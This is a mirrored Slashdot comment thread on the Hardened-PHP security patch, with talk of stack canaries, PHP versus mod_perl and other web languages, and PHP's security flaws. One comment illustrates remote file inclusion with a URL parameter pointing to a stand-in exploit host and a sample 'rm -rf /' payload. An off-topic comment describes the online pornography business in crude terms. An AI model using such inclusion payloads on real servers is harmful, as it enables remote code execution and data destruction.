Slashdot Mirror
Hardened PHP
Frank Kreuzbach writes "Yesterday the Hardened-PHP Project has announced its existence on the PHP-general mailinglist. It is the first public patch for PHP which adds security
hardening features. It is meant as a proactive approach to protect servers against known and unknown weaknesses within PHP scripts or the engine itself. It enforces restrictions on include statements, adds canary protection to allocated memory and other internal structures and protects against internal format string vulnerabilities.
It has syslog support and logs every attack together with the originating ip."
It's a way to protect against buffer overflows. You put some known data on the stack, and before returning from each function call, make sure that data hasn't been changed. Most buffer overflow exploits work by overwriting part fo the stack, and canary protection will detect that the stack has been changed, so the exploit code will not run.
My server
I run http://www.uberhacker.com . This site is dedicated to secure PHP programming. It is better to program secure rather than limit coding abilities. Secure programming allows for a wider range of scripts and security.
Kung-fu comes from China, not Japan.
shrugs.
Hell, people probably can write fast software in PHP... I can't stand the language, myself, so I've never bothered to learn optimization tricks. Mod_perl kicks ass... as Slashdot knows, not to mention Amazon...
Can a PHP devotee who also knows web development from a mod_perl standpoint explain why you like PHP so much? I'm honestly curious. I've modified other people's apps, and find the language both cumbersome to use for non-trivial things and overly low level, at the same time.
I forget what 8 was for.
Not many folks will qualify as knowing both. From my perspective, PHP was stable (MOD_PERL, several years back, was twitchy) and considerably simpler. Remember that to much of the programming world, Perl is weird.
Its advantages: faster (java isn't slow, it has a slow startup, which for a server is hardly a big deal), because the code you write is going to be converted in machine code; scales better (PHP still doesn't provide connection pooling; pconnect doesn't count, btw); more secure (no buffer overflow b/c of java, can use security policies to restrict what your pages are doing)
Its disadvantage: well, you have to learn java. You can't just jump into writing jsp pages, as you'd do with php. But I can equally argue that that's an advantage as well, as it increases the quality of code.
The Raven
Online porn is a huge industry. Think about sites like Hustler.com where you can read backissues of the magazine over the last few years and new issues when they appear on newsstands. They also have most of their full length dvds available to users. That's all of Hustler's Barely Legal videos as well as all their other stuff. Thats a huge amount of high quality content that is difficult to find from free sources.
;)
Then think about sites like ten.com where you can watch literally thousands of full length porn dvds. Thats hundreds of gigabytes of high quality content. The people that run this website get the movies from the cable and satellite networks that they own (exxxtacy, true blue, ten, ten clips etc...). This is the stuff that cable viewers pay $10 a movie to watch on Pay-per-view, so you can see how $20 a month to watch all the movies they want is an attractive price.
Then think about all the niche stuff that is hard to find from free sources. E.g. Max Hardcore, Bukkake, watersports etc. and you will begin to understand how these guys make money. Niches sites are usually more expensive too ($30 -$40 a month). With just 5000 users they make $150,000 - $200,000 a month gross. 5000 perverts aren't that hard to find when you consider that these websites attract users from all over the world.
What the user pays for is access to large amount of high quality content (e.g. huge library of movies), or niche content. Searching for porn on free sites sucks because it is all disorganized. E.g. 15 photos from site number 1, 12 photos from site number 2; and usually the movies from free sites are too short or low quality. Getting free porn from P2P (kazaa, overnet) is another option but the selection is actually pretty small and finding what you are looking for is not an easy task.
This is how online pay porn sites make money.
I'm not extremely familiar with mod_perl, but I do lots of work in PHP.
The reasons I like PHP better than perl for web development is the fact that you can escape in and out of execution (yes, this can be and is often abused) and I like how PHP wraps some of the more unreadable aspects of perl (like extracting arguments, etc) and has nice session support.
Also, PHP seems to have a lot of standard web stuff rolled in by default. I know that you can configure perl to be whatever you want it to be, but back before I had access to my own servers whose environment I could control, this mattered a bit more.
Anyway, just my two cents - it really comes down to personal preference between the two in my opinion - lots of the major disctinctions have gone away in the last couple of years.
$45 per U Colocation Special
Turck MMCache dev stopped since the lead dev was taken in by Zend. That doesn't mean development has stopped though! New people have taken it over and are slowly coding new stuff up!
The ones I'm most familiar with are extensions of Common Lisp. There are 3 CL web servers, each with dynamic HTML generation capability (AllegroServe, Araneida, CL-HTTP). Then there's Lisp Server Pages, Active Lisp Pages, etc., and another whole load of CGI solutions. I use (and highly recommend) AllegroServe. There is a whole big list over at Cliki (which runs on Araneida).
There are many CGI bindings for various Scheme implementations, and the PLT web server is kind of popular. I'm not very familiar with Scheme web solutions though, so I probably left something out.
There is a lot of activity with Smalltalk-based web apps. Seaside is a continuation-based framework that gets a lot of attention. There's also AIDA/Web, and an unfinished mod.Smalltalk. I am not very familiar with Smalltalk web solutions either, so I probably missed a few.
Python is a very popular option, and Zope seems to be a very popular framework. I don't know anything about web programming in Python aside from that.
Take pretty much any of the recent lightweight (in the conference meaning of the term) languages, and you're bound to find good options, almost all of them better in terms of security and speed than PHP; I can't think of a single one that has a more annoying syntax or more convoluted and limited semantics than PHP, though. Another thing that you should consider is the website we're posting on is pretty interactive, and kind of popular, and it's written in Perl.
In the great CONS chain of life, you can either be the CAR or be in the CDR.
No, it's far worse than just reading "/etc/passwd", you could say "action=http://example.com/exploit.php", and PHP will happily (yet stupidly) execute the contents of "exploit.php", whatever that might be (say, "system('rm -rf /');" perhaps?).
Because PHP was written with security as a distant afterthought.
Projects like Mason or Embperl accomplish that same functionality of including excutable code inside special tags, e.g. "" or "<%...%>", but you also harness all the power of mod_perl at the same time.
Mason and Embperl are complete systems built on top of mod_perl, so it's a whole new architecture separate from regular mod_perl.
There is a 2.4.7-dev version from CVS that works quite well with PHP5!
I don't think it's future is in doubt at all, just that the insane pace it was developed at has slowed a little bit.